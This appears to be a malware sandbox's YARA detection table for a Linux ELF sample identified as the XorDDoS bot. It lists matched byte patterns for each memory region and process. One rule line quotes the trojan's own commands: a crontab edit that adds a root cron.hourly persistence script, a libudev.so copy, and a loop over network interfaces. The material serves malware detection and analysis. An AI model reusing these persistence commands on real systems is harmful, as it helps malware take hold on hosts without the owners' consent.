6268.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6268.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6268.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6268.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6268.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6268.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6268.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
Process Memory Space: 1.elf PID: 6204	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: 1.elf PID: 6204	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x119b:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x1278:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: 1.elf PID: 6206	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: 1.elf PID: 6206	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x14ed:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x15ca:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: 1.elf PID: 6207	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: 1.elf PID: 6207	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0xd27:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0xe04:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: 1.elf PID: 6208	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: 1.elf PID: 6208	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0xd27:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0xe04:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: 1.elf PID: 6238	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: 1.elf PID: 6238	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x8a5:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x982:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: 1.elf PID: 6241	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: 1.elf PID: 6241	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x2d3c:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x2e19:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: 1.elf PID: 6244	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: 1.elf PID: 6244	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x8a5:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x982:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: 1.elf PID: 6246	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: 1.elf PID: 6246	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x3166:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x3243:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: 1.elf PID: 6249	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: 1.elf PID: 6249	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x3607:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x36e4:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: 1.elf PID: 6257	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: 1.elf PID: 6257	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x8a5:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x982:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: 1.elf PID: 6260	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: 1.elf PID: 6260	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x8a5:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x982:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: 1.elf PID: 6263	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: 1.elf PID: 6263	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x8a5:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x982:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: 1.elf PID: 6265	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: 1.elf PID: 6265	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x8a5:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x982:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: 1.elf PID: 6268	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: 1.elf PID: 6268	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x117d:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x125a:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: 1.elf PID: 6274	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: 1.elf PID: 6274	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x8a5:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x982:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: 1.elf PID: 6277	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: 1.elf PID: 6277	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x360f:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x36ec:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: 1.elf PID: 6279	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: 1.elf PID: 6279	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x3613:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x36f0:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: 1.elf PID: 6282	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: 1.elf PID: 6282	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x3614:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x36f1:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: 1.elf PID: 6285	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: 1.elf PID: 6285	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x8a5:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x982:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: 1.elf PID: 6312	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: 1.elf PID: 6312	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x360d:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x36ea:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: 1.elf PID: 6315	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: 1.elf PID: 6315	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x31e3:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x32c0:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: 1.elf PID: 6317	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: 1.elf PID: 6317	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x360d:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x36ea:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: 1.elf PID: 6320	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: 1.elf PID: 6320	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x3502:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x35df:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: 1.elf PID: 6323	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: 1.elf PID: 6323	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x360d:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x36ea:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: 1.elf PID: 6329	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: 1.elf PID: 6329	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x1170:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x124d:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: 1.elf PID: 6332	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: 1.elf PID: 6332	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x8a5:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x982:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: 1.elf PID: 6335	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: 1.elf PID: 6335	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x9b0:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0xa8d:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: 1.elf PID: 6337	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: 1.elf PID: 6337	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0xd46:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0xe23:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: 1.elf PID: 6340	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: 1.elf PID: 6340	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x9b0:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0xa8d:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: 1.elf PID: 6346	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: 1.elf PID: 6346	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x32f5:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x33d2:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: 1.elf PID: 6349	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: 1.elf PID: 6349	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x31e3:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x32c0:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: 1.elf PID: 6351	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: 1.elf PID: 6351	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x360d:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x36ea:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: 1.elf PID: 6354	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: 1.elf PID: 6354	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x3615:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x36f2:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: 1.elf PID: 6357	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: 1.elf PID: 6357	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x8a5:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x982:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: 1.elf PID: 6363	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: 1.elf PID: 6363	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x351a:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x35f7:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: 1.elf PID: 6366	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: 1.elf PID: 6366	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x8a5:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x982:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: 1.elf PID: 6368	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: 1.elf PID: 6368	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x8a5:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x982:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: 1.elf PID: 6371	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: 1.elf PID: 6371	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x31ea:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x32c7:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: 1.elf PID: 6374	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: 1.elf PID: 6374	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0xe51:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0xf2e:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: 1.elf PID: 6382	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: 1.elf PID: 6382	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x31e3:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x32c0:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: 1.elf PID: 6385	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: 1.elf PID: 6385	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x8a5:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x982:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: 1.elf PID: 6388	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: 1.elf PID: 6388	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x3614:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x36f1:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: 1.elf PID: 6390	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: 1.elf PID: 6390	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x1065:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x1142:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: 1.elf PID: 6393	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: 1.elf PID: 6393	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x2d42:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x2e1f:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: 1.elf PID: 6402	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: 1.elf PID: 6402	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x31eb:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x32c8:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: 1.elf PID: 6405	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: 1.elf PID: 6405	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x360d:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x36ea:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: 1.elf PID: 6408	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: 1.elf PID: 6408	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x31e3:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x32c0:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: 1.elf PID: 6411	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: 1.elf PID: 6411	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x1065:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x1142:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: 1.elf PID: 6414	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: 1.elf PID: 6414	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0xccf:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0xdac:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: 1.elf PID: 6419	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: 1.elf PID: 6419	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x8a5:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x982:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: 1.elf PID: 6422	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: 1.elf PID: 6422	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x3300:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x33dd:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: 1.elf PID: 6424	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: 1.elf PID: 6424	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x32fa:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x33d7:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: 1.elf PID: 6427	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: 1.elf PID: 6427	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x350e:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x35eb:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: 1.elf PID: 6430	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: 1.elf PID: 6430	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x9b0:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0xa8d:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: 1.elf PID: 6436	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: 1.elf PID: 6436	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x32f4:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x33d1:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: 1.elf PID: 6439	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: 1.elf PID: 6439	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x3061:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x313e:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: 1.elf PID: 6441	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: 1.elf PID: 6441	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x32ee:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x33cb:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: 1.elf PID: 6444	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: 1.elf PID: 6444	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x8a5:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x982:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: 1.elf PID: 6447	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: 1.elf PID: 6447	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x3502:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x35df:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: 1.elf PID: 6453	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: 1.elf PID: 6453	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0xbc4:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0xca1:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: 1.elf PID: 6456	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: 1.elf PID: 6456	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x3502:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x35df:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: 1.elf PID: 6458	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: 1.elf PID: 6458	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x8a5:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x982:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: 1.elf PID: 6461	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: 1.elf PID: 6461	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x3061:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x313e:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: 1.elf PID: 6464	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: 1.elf PID: 6464	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x360d:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x36ea:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: 1.elf PID: 6470	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: 1.elf PID: 6470	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x31e3:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x32c0:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: 1.elf PID: 6473	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: 1.elf PID: 6473	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x2d42:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x2e1f:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: 1.elf PID: 6475	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: 1.elf PID: 6475	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x8a5:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x982:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: 1.elf PID: 6478	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: 1.elf PID: 6478	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x2d42:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x2e1f:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: 1.elf PID: 6482	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: 1.elf PID: 6482	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x3061:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x313e:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: 1.elf PID: 6488	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: 1.elf PID: 6488	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0xe61:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0xf3e:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: 1.elf PID: 6491	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: 1.elf PID: 6491	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x360d:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x36ea:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: 1.elf PID: 6494	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: 1.elf PID: 6494	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0xbc4:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0xca1:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: 1.elf PID: 6496	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: 1.elf PID: 6496	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x360d:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x36ea:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: 1.elf PID: 6499	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: 1.elf PID: 6499	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x360d:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x36ea:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: 1.elf PID: 6505	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: 1.elf PID: 6505	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0xbc4:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0xca1:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: 1.elf PID: 6508	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: 1.elf PID: 6508	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0xd4e:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0xe2b:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: 1.elf PID: 6510	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: 1.elf PID: 6510	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x3615:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x36f2:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
